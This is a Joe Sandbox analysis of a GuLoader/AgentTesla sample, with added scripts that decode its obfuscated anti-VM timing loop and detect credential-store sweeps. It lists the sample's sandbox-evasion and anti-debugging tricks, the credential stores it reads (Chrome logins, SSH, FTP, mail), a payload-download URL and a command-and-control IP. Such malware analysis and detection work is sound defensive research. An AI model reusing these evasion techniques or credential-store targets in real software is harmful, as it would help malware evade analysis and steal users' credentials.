    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=7B0580AA0B18AE44&RESID=7B0580AA0B18AE44%21106&AUTHKEY=ANQAOZGBUZCFLEEWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A36A second address: 0000000003D1A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056A36A second address: 000000000056A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeRDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 6988Thread sleep count: 205 > 30
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 7032Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread delayed: delay time: 60000
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgBuZcfleEwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeSystem information queried: ModuleInformation
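    The two RDTSC interceptor listings above (the entries starting at 03D1A3AE / 0056392D, cited under both "Detected RDTSC dummy instruction sequence" and "Tries to detect virtualization through RDTSC time measurements") show the mechanism behind both signatures. The block is rdtsc, cpuid with eax=1, rdtsc: under a hypervisor cpuid forces a VM exit, so the gap between the two timestamp reads is far larger than on bare metal, and running the block thousands of times also hammers any sandbox that hooks or emulates those instructions. Every constant the loop needs is built as a mov immediate followed by a run of xor/add/sub immediates, padded with cmp/test instructions whose flags are never read, so nothing meaningful appears literally in the code. The script below is an added example for this page, not Joe Sandbox or GuLoader code: a small immediate-arithmetic reducer that replays the mov/xor/add/sub chains over the two listings copied from this report and reports each effective value at the instruction that actually consumes it (a compare whose flags reach a conditional jump, an implicit cpuid operand, or a pushad). The register aliasing, the flags-consumer heuristic for telling real compares from junk, and the 32-bit wraparound model are the script's own assumptions.

```python
"""Reduce GuLoader's obfuscated immediates: added example, not Joe Sandbox or GuLoader code."""
import re

# Both listings are copied verbatim from the report's RDTSC instruction interceptor entries.
LISTING_1 = (
    "0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad "
    "0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h "
    "0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h "
    "0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh "
    "0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] "
    "0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch "
    "0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al "
    "0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx "
    "0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx "
    "0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh "
    "0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h "
    "0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] "
    "0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] "
    "0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h "
    "0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h "
    "0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc"
)
LISTING_2 = (
    "0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx "
    "0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx "
    "0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh "
    "0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh "
    "0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax "
    "0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx "
    "0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h "
    "0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc"
)

GPR = ["eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"]
ALIAS = {s: r for r in GPR[:4] for s in (r[1:], r[1] + "l", r[1] + "h")}  # ax/al/ah -> eax, ...
ALIAS.update({"si": "esi", "di": "edi", "bp": "ebp", "sp": "esp"})
REG_RE = re.compile(r"\b(e?[a-d]x|[a-d][lh]|e?si|e?di|e?bp|e?sp)\b")   # listing registers are lowercase
IMM_RE = re.compile(r"^[0-9A-F]+h$")                                  # listing immediates are MASM hex
FLAG_WRITERS = {"add", "sub", "xor", "or", "and", "inc", "dec", "shl", "cmp", "test"}
WRITERS = {"mov", "xor", "add", "sub", "or", "and", "shl", "inc", "dec"}
IMPLICIT = {  # mnemonic -> (implicitly read registers, implicitly written registers)
    "cpuid": (["eax", "ecx"], GPR[:4]), "rdtsc": ([], ["eax", "edx"]),
    "pushad": (GPR, []), "popad": ([], GPR),
}

def parse(listing):
    """Split a Joe Sandbox listing into (mnemonic, [operands]) tuples."""
    out = []
    for text in re.split(r"0x[0-9a-f]{8} ", listing)[1:]:
        mnem, _, rest = text.strip().partition(" ")
        out.append((mnem, [o.strip() for o in rest.split(",")] if rest else []))
    return out

def regs(text):
    """Normalised 32-bit registers named anywhere in text (al, ax -> eax)."""
    return {ALIAS.get(r, r) for r in REG_RE.findall(text)}

def width(key):
    """Bit mask for a chain key: byte/word memory operands, else 32 bits."""
    return {"byte": 0xFF, "word": 0xFFFF}.get(key.split()[0], 0xFFFFFFFF)

def flags_consumed(instrs, i):
    """True if the flags set by instrs[i] reach a conditional jump before another
    flag-writing instruction overwrites them (a real check rather than junk)."""
    for mnem, _ in instrs[i + 1:]:
        if mnem.startswith("j") and mnem != "jmp":
            return True
        if mnem in FLAG_WRITERS:
            return False
    return False

def reduce_constants(listing):
    """Return [(key, effective value, consuming instruction)] for every
    mov/xor/add/sub immediate chain in the listing, in listing order."""
    instrs = parse(listing)
    chains, found = {}, []
    for i, (mnem, ops) in enumerate(instrs):
        text = f"{mnem} {', '.join(ops)}".strip()
        dst, src = (ops + [None, None])[:2]
        imm = int(src[:-1], 16) if src and IMM_RE.match(src) else None
        if mnem == "mov" and imm is not None:                # a chain starts
            chains[dst] = imm & width(dst)
            continue
        if mnem in ("xor", "add", "sub") and imm is not None and dst in chains:
            v = chains[dst]
            chains[dst] = {"xor": v ^ imm, "add": v + imm, "sub": v - imm}[mnem] & width(dst)
            continue
        if mnem in ("inc", "dec") and dst in chains:
            chains[dst] = (chains[dst] + (1 if mnem == "inc" else -1)) & width(dst)
            continue
        if mnem in ("cmp", "test") and not flags_consumed(instrs, i):
            continue                                         # junk compare: result is discarded
        reads, writes = IMPLICIT.get(mnem, ([], []))
        touched = regs(text) | set(reads) | set(writes)
        written = set(writes)
        if mnem in WRITERS and ALIAS.get(dst, dst) in GPR:
            written.add(ALIAS.get(dst, dst))
        for key in list(chains):                             # consumed, or its address clobbered?
            if key in ops or (key in GPR and key in touched) or (regs(key) & written):
                found.append((key, chains.pop(key), text))
    for key, value in chains.items():
        found.append((key, value, "(end of listing)"))
    return found

if __name__ == "__main__":
    for name, listing in (("listing 1", LISTING_1), ("listing 2", LISTING_2)):
        for key, value, consumer in reduce_constants(listing):
            print(f"{name}: {key} = {value:#x}  used by: {consumer}")
```

    Running it shows that the first listing's counter at [ebp+189h] is compared against 0x2000, that a word at [ebx+5] is compared with 0xE0FF and a dword at [ebx] with 0x9090C350, and that the second listing's byte-wise xor chain writes 0x00 (an obfuscated zeroing loop) while its ecx chain rebuilds exactly the 0x45FB412A that the same loop subtracts at its top, so the counter survives the obfuscation unchanged. What the compared memory values refer to cannot be determined from the report alone.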

    Anti Debugging:

    Hides threads from debuggers
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1611B rdtsc
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D17601 LdrInitializeThunk,
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D8D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18769 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D19D39 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D140DC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D16245 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D1347D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeCode function: 1_2_03D18E26 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeProcess created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information:

    GuLoader behavior detected
    Source: Initial fileSignature Results: GuLoader behavior
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Tries to harvest and steal ftp login credentials
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
    Tries to steal Mail credentials (via file access)
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
    Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
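    The registry keys and file paths in this section are what an endpoint detection would key on. No single legitimate program ever opens KiTTY sessions, WinSCP settings, Chrome's Login Data, Far and ClassicFTP host lists, IncrediMail identities and the Outlook MAPI profile, so an executable from the user's Desktop reading SSH/SCP, browser, FTP and mail credential stores within seconds is a strong signal even before any network activity. The script below is an added example for this page, not part of the Joe Sandbox report: it runs that logic over a constructed stream of file and registry open events and returns one finding per process that reads three or more distinct store categories it does not own inside a 60-second window. The targets for the sample are exactly the ones listed above; the timestamps, pids, the benign processes and the owner allowlist are assumptions.

```python
"""Credential-store sweep detector: added example, not part of the Joe Sandbox report."""
import re
from datetime import datetime, timedelta

# Stores the report shows the sample reading, grouped by what they hold. The
# patterns are the registry keys and file paths listed in this report.
CRED_STORES = {
    "ssh/scp clients": [r"\\Software\\9bis\.com\\KiTTY\\Sessions$", r"\\Software\\Martin Prikryl$"],
    "browser logins":  [r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$"],
    "ftp clients":     [r"\\Software\\Far2?\\Plugins\\FTP\\Hosts$",
                        r"\\Software\\NCH Software\\ClassicFTP\\FTPAccounts$"],
    "mail clients":    [r"\\Software\\IncrediMail\\Identities$",
                        r"\\Windows Messaging Subsystem\\Profiles\\Outlook$"],
}
PATTERNS = [(cat, re.compile(p, re.IGNORECASE)) for cat, pats in CRED_STORES.items() for p in pats]

# Programs expected to open each store (assumed allowlist, not taken from the report).
OWNERS = {
    "ssh/scp clients": {"kitty.exe", "winscp.exe"},
    "browser logins":  {"chrome.exe"},
    "ftp clients":     {"far.exe", "classicftp.exe"},
    "mail clients":    {"outlook.exe", "incmail.exe"},
}

def classify(target):
    """Category of a file/registry target, or None if it is not a credential store."""
    for cat, rx in PATTERNS:
        if rx.search(target):
            return cat
    return None

def credential_sweeps(events, min_categories=3, window=timedelta(seconds=60)):
    """events: iterable of (timestamp, pid, image path, target) open events.
    Returns one finding per process that reads at least min_categories distinct
    credential-store categories it does not own within `window`."""
    hits = {}
    for ts, pid, image, target in events:
        cat = classify(target)
        if cat is None or image.rsplit("\\", 1)[-1].lower() in OWNERS[cat]:
            continue                                   # not a store, or the store's own program
        hits.setdefault(pid, []).append((ts, image, cat, target))
    findings = []
    for pid, rows in hits.items():
        rows.sort(key=lambda r: r[0])
        for i, (t0, image, _, _) in enumerate(rows):
            span = [r for r in rows[i:] if r[0] - t0 <= window]   # window starting at each hit
            cats = sorted({r[2] for r in span})
            if len(cats) >= min_categories:
                findings.append({"pid": pid, "image": image, "categories": cats,
                                 "targets": [r[3] for r in span]})
                break
    return findings

# Constructed event stream: timestamps, pids and the benign processes are made up;
# the targets for pid 24 are the ones this report lists for the sample.
T = datetime(2021, 8, 3, 8, 6, 0)
SAMPLE = r"C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe"
EVENTS = [
    (T, 24, SAMPLE, r"HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions"),
    (T + timedelta(seconds=1), 24, SAMPLE, r"HKEY_CURRENT_USER\Software\Martin Prikryl"),
    (T + timedelta(seconds=2), 24, SAMPLE, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (T + timedelta(seconds=3), 24, SAMPLE, r"HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts"),
    (T + timedelta(seconds=3), 24, SAMPLE, r"HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts"),
    (T + timedelta(seconds=4), 24, SAMPLE, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (T + timedelta(seconds=4), 24, SAMPLE,
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
    # benign noise: the real owners touching their own stores, and one tool touching a single store
    (T + timedelta(seconds=5), 4100, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (T + timedelta(seconds=6), 4200, "OUTLOOK.EXE",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
    (T + timedelta(seconds=7), 4300, "backup.exe", r"HKEY_CURRENT_USER\Software\Martin Prikryl"),
]

if __name__ == "__main__":
    for f in credential_sweeps(EVENTS):
        print(f"pid {f['pid']} {f['image']}: read {len(f['categories'])} credential stores "
              f"({', '.join(f['categories'])}) in one window")
```

    The allowlist is what keeps this rule quiet on a normal workstation: Chrome reading its own Login Data or Outlook opening its profile key is routine, and a single tool reading a single store stays below the threshold. The threshold of three categories is a tuning choice; with the seven targets the report lists, the sample trips it with a category to spare.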

    Mitre Att&ck Matrix

    Digits after a technique name are the report's signature-count badges, reproduced as extracted (a run such as 621 is several badge counts, not one number); cells without a count are the matrix template, not observed behaviour.

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 621 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 221 | Input Capture 11 | Virtualization/Sandbox Evasion 221 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Credentials in Registry 1 | Remote System Discovery 1 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Data from Local System 2 | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 34 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    KHAWATMI CO.IMPORT & EXPORT.exe | 13% | ReversingLabs | Win32.Trojan.AgentTesla |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2 | 0% | Avira URL Cloud | safe |
    http://crl.microsoft | 0% | URL Reputation | safe |

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    mbdetq.dm.files.1drv.com | unknown | unknown | false | | high
    onedrive.live.com | unknown | unknown | false | | high

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://185.227.139.18/dsaicosaicasdi.php/a1NQk98eWCWX2 | false | Avira URL Cloud: safe | unknown
    https://onedrive.live.com/download?cid=7B0580AA0B18AE | false | | high

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg | KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp | false | | high
    http://crl.microsoft | KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

    Contacted IPs

    Public

    IP | Domain | Country | ASN | ASN Name | Malicious
    185.227.139.18 | unknown | Iran (ISLAMIC Republic Of) | 48011 | DIGITURUNCTR | false

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:458277
            Start date:03.08.2021
            Start time:08:05:18
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 29s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:KHAWATMI CO.IMPORT & EXPORT.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Run name:Suspected Instruction Hammering Hide Perf
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@3/2@2/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 2.2% (good quality ratio 0.2%)
            • Quality average: 1.5%
            • Quality standard deviation: 4.5%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
